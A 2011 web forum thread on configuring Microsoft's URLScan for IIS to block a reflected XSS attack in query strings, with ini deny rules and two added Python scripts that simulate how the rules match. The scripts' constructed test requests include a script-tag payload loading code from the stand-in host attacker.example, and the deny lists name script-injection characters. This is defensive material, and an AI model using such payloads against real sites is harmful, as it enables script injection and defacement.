Forum Moderators: ocean10000

URLScan Help

12:59 pm on Feb 26, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Does anyone know how to set a rule to apply only to the stuff after the '?' (the query string, not the URL)?

There is a particular reflected XSS attack that's making my visitors with old browsers think they are on another site, by circulating links with a script tag in the URL that places a competitor's logo over my logo using CSS.

I just want to add a rule to put the word script after the '?' character
4:12 pm on Feb 26, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Creating a Deny List of Query String Sequences


[Options]
; Scan each query string twice: raw and after one round of %XX unescaping,
; so %3Cscript%3E is caught as well as a literal <script>.
UnescapeQueryString=1
[DenyQueryStringSequences]
<
>


This should block script tags in the URL in both unescaped and escaped forms, since it blocks the angle brackets from being allowed in the URL string.

Reference
Common UrlScan Scenarios [learn.iis.net]
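The following Python script is an added illustration of what the two settings above do to the original poster's attack link; it is not UrlScan code and not from the thread. It assumes, as the UrlScan reference describes for UnescapeQueryString=1, that the query string is scanned once raw and once after a single round of %XX unescaping, and it assumes matching is case-insensitive. The sample URLs and the hostname attacker.example are constructed.

```python
from typing import Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed to mirror the [DenyQueryStringSequences] entries in the post above.
DENY_QUERY_STRING_SEQUENCES = ["<", ">"]


def denied_query_sequence(query: str, unescape: bool = True) -> Optional[str]:
    """Return the first denied sequence found in the query string, else None.

    unescape=True mirrors UnescapeQueryString=1: the query string is scanned
    twice, once raw and once after a single round of %XX unescaping.
    Matching is case-insensitive here (assumption about UrlScan's behaviour).
    """
    candidates = [query]
    if unescape:
        candidates.append(unquote(query))
    for text in candidates:
        low = text.lower()
        for seq in DENY_QUERY_STRING_SEQUENCES:
            if seq.lower() in low:
                return seq
    return None


def check_request(url: str, unescape: bool = True) -> Tuple[bool, str]:
    """Apply only the query-string rule (the part after '?') to a request URL.

    The path is deliberately not scanned: [DenyQueryStringSequences] is the
    section that matches after the '?' only, which is what the question asked
    for; a '<' in the path would need [DenyUrlSequences] instead.
    """
    query = urlsplit(url).query
    hit = denied_query_sequence(query, unescape=unescape)
    if hit is None:
        return True, "allowed"
    return False, "denied: query string contains %r" % hit


if __name__ == "__main__":
    # Constructed sample requests: the reflected-XSS style link from the
    # question in literal, escaped and double-escaped forms, plus one with the
    # tag in the path rather than the query string.
    for u in [
        "/page.aspx?q=hello",
        "/page.aspx?q=<script src=http://attacker.example/x.js></script>",
        "/page.aspx?q=%3CScRiPt%3E",
        "/page.aspx?q=%253Cscript%253E",   # double-encoded: not caught by this rule
        "/<script>/page.aspx",             # in the path: not this rule's job
    ]:
        print(u, "->", check_request(u))
```

Two things the run makes visible: with unescape=False the %3Cscript%3E form sails through, which is why the answer sets UnescapeQueryString=1; and a double-encoded %253Cscript%253E still passes, because one round of unescaping yields the literal text %3Cscript%3E, which contains no angle bracket. Whether that second form is dangerous depends on whether the application decodes the value a second time.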
5:54 pm on Mar 15, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Are you good with this tool? If so, sticky me please.
7:03 pm on Mar 15, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


What type of problems are you trying to handle with the URLScan tool? Did the previous post not help or work? Maybe the question can be answered here in public, and the answers posted can help others in your situation.
1:52 pm on Mar 18, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


I'm just trying to understand it at a high level to apply some rules to different sites and apps.

I have various sites that allow uploads and access to uploaded files and don't have to hand all the different URLs used, so I am reactively adding exceptions as and when the logs show me.

Ideally I want to whitelist these URLs from just the denied query strings, not the denied URLs.
2:50 pm on Mar 21, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


What does the DenyDataSection do? Does it overrule DenyURLSequences and DenyQueryStrings or apply in addition?

Does 404 apply before or after URLScan rules?

If denied extensions includes .exe and AppliesTo only includes .aspx, will .exe files be blocked?

When do rule and option changes take effect?
12:25 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


After doing a bit of research, "DenyDataSection" is a way to reuse rule sets in the ini file.

link [learn.iis.net]


[Options]
RuleList=MyAspRule,MyPhpRule

[MyAspRule]
AppliesTo=.asp, .aspx
DenyDataSection=MyRuleData
ScanURL=0
ScanAllRaw=1
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyPhpRule]
AppliesTo=.php
DenyDataSection=MyRuleData
ScanURL=1
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyRuleData]
< ; Used by script injection attacks.
> ; Used by script injection attacks.
@ ; Used by script injection attacks.
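To show how the RuleList configuration above is scoped (and, for the later question about where the common data applies, that each rule only looks at what its ScanURL and ScanQueryString flags say, and only for the extensions in its AppliesTo), here is an added Python simulation that parses the posted ini text and evaluates a few constructed requests against it. It is not UrlScan code and not from the thread. It models only RuleList, AppliesTo, ScanURL, ScanQueryString and DenyDataSection, scanning query strings raw and once-unescaped; ScanAllRaw, ScanHeaders, DenyUnescapedPercent and the global deny sections are left out, and case-insensitive matching is an assumption.

```python
import configparser
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# The RuleList/DenyDataSection configuration from the post above, embedded
# so the example runs offline.
URLSCAN_INI = """
[Options]
RuleList=MyAspRule,MyPhpRule

[MyAspRule]
AppliesTo=.asp, .aspx
DenyDataSection=MyRuleData
ScanURL=0
ScanAllRaw=1
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyPhpRule]
AppliesTo=.php
DenyDataSection=MyRuleData
ScanURL=1
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyRuleData]
< ; Used by script injection attacks.
> ; Used by script injection attacks.
@ ; Used by script injection attacks.
"""


def load_rules(ini_text: str) -> List[dict]:
    """Parse [Options] RuleList and each named rule section into dicts."""
    cfg = configparser.ConfigParser(
        allow_no_value=True,             # deny-data entries are bare lines, no '='
        inline_comment_prefixes=(";",),  # drop the '; Used by ...' trailers
        interpolation=None,
    )
    cfg.read_string(ini_text)
    rules = []
    for name in cfg.get("Options", "RuleList").split(","):
        name = name.strip()
        sec = cfg[name]
        rules.append({
            "name": name,
            "applies_to": {e.strip().lower() for e in sec["AppliesTo"].split(",")},
            "scan_url": sec.get("ScanURL", "0") == "1",
            "scan_query": sec.get("ScanQueryString", "0") == "1",
            # The keys of the shared data section are the denied sequences.
            "deny": list(cfg[sec["DenyDataSection"]].keys()),
        })
    return rules


def evaluate(rules: List[dict], url: str) -> Tuple[bool, Optional[str], Optional[str], Optional[str]]:
    """Return (allowed, rule_name, where, sequence) for a request URL.

    Only rules whose AppliesTo lists the requested file's extension are
    consulted. Each scans the path (ScanURL) and/or the query string
    (ScanQueryString); the query string is checked raw and after one round
    of %XX unescaping. Everything else in the ini is ignored (assumption).
    """
    parts = urlsplit(url)
    ext = posixpath.splitext(parts.path)[1].lower()
    for rule in rules:
        if ext not in rule["applies_to"]:
            continue
        targets = []
        if rule["scan_url"]:
            targets.append(("url", unquote(parts.path)))
        if rule["scan_query"]:
            targets.append(("query", parts.query))
            targets.append(("query", unquote(parts.query)))
        for where, text in targets:
            low = text.lower()
            for seq in rule["deny"]:
                if seq in low:
                    return False, rule["name"], where, seq
    return True, None, None, None


if __name__ == "__main__":
    rules = load_rules(URLSCAN_INI)
    # Constructed sample requests; the address is a placeholder.
    for u in [
        "/page.aspx?id=1",
        "/page.aspx?id=%3Cscript%3E",
        "/page.aspx?email=user@example.com",   # '@' in the shared data bites here
        "/<b/page.aspx",                       # MyAspRule has ScanURL=0
        "/<b/page.php",                        # MyPhpRule has ScanURL=1
        "/doc.txt?x=<script>",                 # no rule's AppliesTo covers .txt
    ]:
        print(u, "->", evaluate(rules, u))
```

The run illustrates the scoping that the thread circles around: the same three sequences hit the query string for .aspx but not its path, hit both for .php, and touch a .txt upload not at all, so custom rules do not by themselves replace the global deny sections. It also shows the cost of putting '@' in the shared list: any .aspx page that receives an email address in its query string is denied, which is the kind of false positive that forces reactively adding exceptions.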
2:09 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Does 404 apply before or after URL Scan rules?


404 are applied after the URLScan is run.
3:56 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Does it overrule DenyURLSequences and DenyQueryStrings or apply in addition?


I can't find any info on this, but my guess is that it is in addition to the existing rules.
4:23 pm on Mar 22, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Thanks

I can't get that common data to work; it's not clear whether it applies to the URL, query string, verb, form data, etc.

There doesn't seem to be much in the way of documentation. Do you know if it's been superseded by another tool?
4:53 pm on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


The common data will only work with the latest version of URLScan, 3.51 I believe. If you have a previous version it will not work. Also, changes to the ini are only refreshed after restarting IIS completely.

Microsoft is pushing "Request Filtering" in IIS 7. I don't see any options for this to work in versions previous to this, though.
Request Filtering [iis.net]
8:48 pm on Mar 22, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


That looks much better, but for my 2003 servers I'll have to stick with URLScan for now.